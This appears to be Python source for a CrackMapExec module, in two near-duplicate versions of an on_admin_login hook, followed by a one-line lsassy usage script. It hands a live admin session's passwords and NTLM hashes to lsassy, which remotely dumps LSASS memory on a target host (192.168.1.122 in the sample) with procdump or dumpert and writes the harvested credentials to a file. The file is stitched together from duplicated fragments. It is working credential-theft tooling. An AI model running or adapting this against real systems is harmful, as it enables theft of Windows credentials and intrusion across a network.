def on_admin_login(self, context, connection) -> None:
    """Hook run after an administrative login: hand the connection to lsassy.

    Args:
        context: CME module context. Only ``context.log`` (``.error``) and
            ``context.verbose`` are read here.
        connection: live CME connection. Its ``domain``, ``username``,
            ``host`` and credential material (``password``, ``lmhash``,
            ``nthash``) are copied into a brand-new lsassy session because
            the connection object itself cannot be shared (see the note
            below).

    Returns:
        None. On success the parsed result is forwarded to
        ``self.process_credentials``; on failure the error message (and, when
        verbose, the exception text) is logged via ``context.log.error``.
    """
    if self.bloodhound:
        # presumably flags the host as owned in BloodHound; verify in set_as_owned
        self.set_as_owned(context, connection)
    """
    Since lsassy is py3.6+ and CME is still py2, lsassy cannot be imported.
    For this reason, connection information must be sent to lsassy so it can create a new connection.
    When CME is py3.6 compatible, CME connection object will be reused.
    """
    domain_name = connection.domain
    username = connection.username
    # Credential attributes may be absent (getattr default) or present but None;
    # both cases are normalised to "" before being passed on.
    password = getattr(connection, "password", "")
    lmhash = getattr(connection, "lmhash", "")
    nthash = getattr(connection, "nthash", "")
    password = "" if password is None else password
    lmhash = "" if lmhash is None else lmhash
    nthash = "" if nthash is None else nthash
    host = connection.host
    log_options = Logger.Options()
    dump_options = Dumper.Options()
    parse_options = Parser.Options()
    write_option = Writer.Options()
    # Module options are applied only when set; each one overrides a Dumper
    # default. ``method`` is coerced with int(), so a non-numeric option value
    # raises ValueError here rather than inside lsassy.
    if self.method:
        dump_options.method = int(self.method)
    if self.remote_lsass_dump:
        dump_options.dumpname = self.remote_lsass_dump
    if self.procdump_path:
        dump_options.procdump_path = self.procdump_path
    if self.dumpert_path:
        dump_options.dumpert_path = self.dumpert_path
    lsassy = Lsassy(
        hostname=host,
        username=username,
        domain=domain_name,
        password=password,
        lmhash=lmhash,
        nthash=nthash,
        log_options=log_options,
        dump_options=dump_options,
        parse_options=parse_options,
        write_options=write_option,
    )
    # get_credentials() returns a dict; the keys read here are 'success',
    # 'error_msg', 'error_exception' and 'credentials'.
    credentials = lsassy.get_credentials()
    if not credentials['success']:
        context.log.error(credentials['error_msg'])
        # Exception text is only surfaced in verbose mode.
        if context.verbose and credentials['error_exception']:
            context.log.error(credentials['error_exception'])
    else:
        self.process_credentials(context, connection, credentials["credentials"])
def on_admin_login(self, context, connection) -> None:
    """Hook run after an administrative login: hand the connection to lsassy.

    Args:
        context: CME module context. Only ``context.log`` (``.error``) and
            ``context.verbose`` are read here.
        connection: live CME connection. Its ``domain``, ``username``,
            ``host`` and credential material (``password``, ``lmhash``,
            ``nthash``, ``kerberos``) are copied into a new lsassy session.

    Returns:
        None. On success the parsed result is forwarded to
        ``self.process_credentials``; on failure the error message (and, when
        verbose, the exception text) is logged via ``context.log.error``.
    """
    if self.bloodhound:
        # presumably flags the host as owned in BloodHound; verify in set_as_owned
        self.set_as_owned(context, connection)
    domain_name = connection.domain
    username = connection.username
    # Credential attributes may be absent (getattr default) or present but None;
    # password/lmhash/nthash are normalised to "" in both cases.
    password = getattr(connection, "password", "")
    lmhash = getattr(connection, "lmhash", "")
    nthash = getattr(connection, "nthash", "")
    # NOTE(review): unlike the fields above, kerberos defaults to "" (not
    # False) when the attribute is missing and is not None-normalised —
    # confirm Lsassy treats "" as "kerberos disabled".
    kerberos = getattr(connection, "kerberos", "")
    password = "" if password is None else password
    lmhash = "" if lmhash is None else lmhash
    nthash = "" if nthash is None else nthash
    host = connection.host
    log_options = Logger.Options()
    dump_options = Dumper.Options()
    parse_options = Parser.Options()
    # Output is requested as JSON with the writer silenced; the result is
    # consumed programmatically by process_credentials below.
    write_option = Writer.Options(format="json", quiet=True)
    # Module options are applied only when set; each one overrides a Dumper
    # default. ``method`` is coerced with int(), so a non-numeric option value
    # raises ValueError here rather than inside lsassy.
    if self.method:
        dump_options.method = int(self.method)
    if self.remote_lsass_dump:
        dump_options.dumpname = self.remote_lsass_dump
    if self.procdump_path:
        dump_options.procdump_path = self.procdump_path
    if self.dumpert_path:
        dump_options.dumpert_path = self.dumpert_path
    lsassy = Lsassy(
        kerberos=kerberos,
        hostname=host,
        username=username,
        domain=domain_name,
        password=password,
        lmhash=lmhash,
        nthash=nthash,
        log_options=log_options,
        dump_options=dump_options,
        parse_options=parse_options,
        write_options=write_option,
    )
    # get_credentials() returns a dict; the keys read here are 'success',
    # 'error_msg', 'error_exception' and 'credentials'.
    credentials = lsassy.get_credentials()
    if not credentials['success']:
        context.log.error(credentials['error_msg'])
        # Exception text is only surfaced in verbose mode.
        if context.verbose and credentials['error_exception']:
            context.log.error(credentials['error_exception'])
    else:
        self.process_credentials(context, connection, credentials["credentials"])
# Author: # Romain Bentz (pixis - @hackanddo) # Website: # https://beta.hackndo.com from lsassy import Lsassy, Logger, Dumper, Parser, Writer log_options = Logger.Options(verbosity=2, quiet=False) dump_options = Dumper.Options(method=2, dumpname="lsass.dmp", procdump="/opt/Sysinternals/procdump.exe") parse_options = Parser.Options(raw=True) write_option = Writer.Options(format="pretty", output_file="/tmp/credentials.txt") lsassy = Lsassy(hostname="192.168.1.122", username="******", domain="adsec.local", password="******", log_options=log_options, dump_options=dump_options, parse_options=parse_options, write_options=write_option) print(lsassy.get_credentials())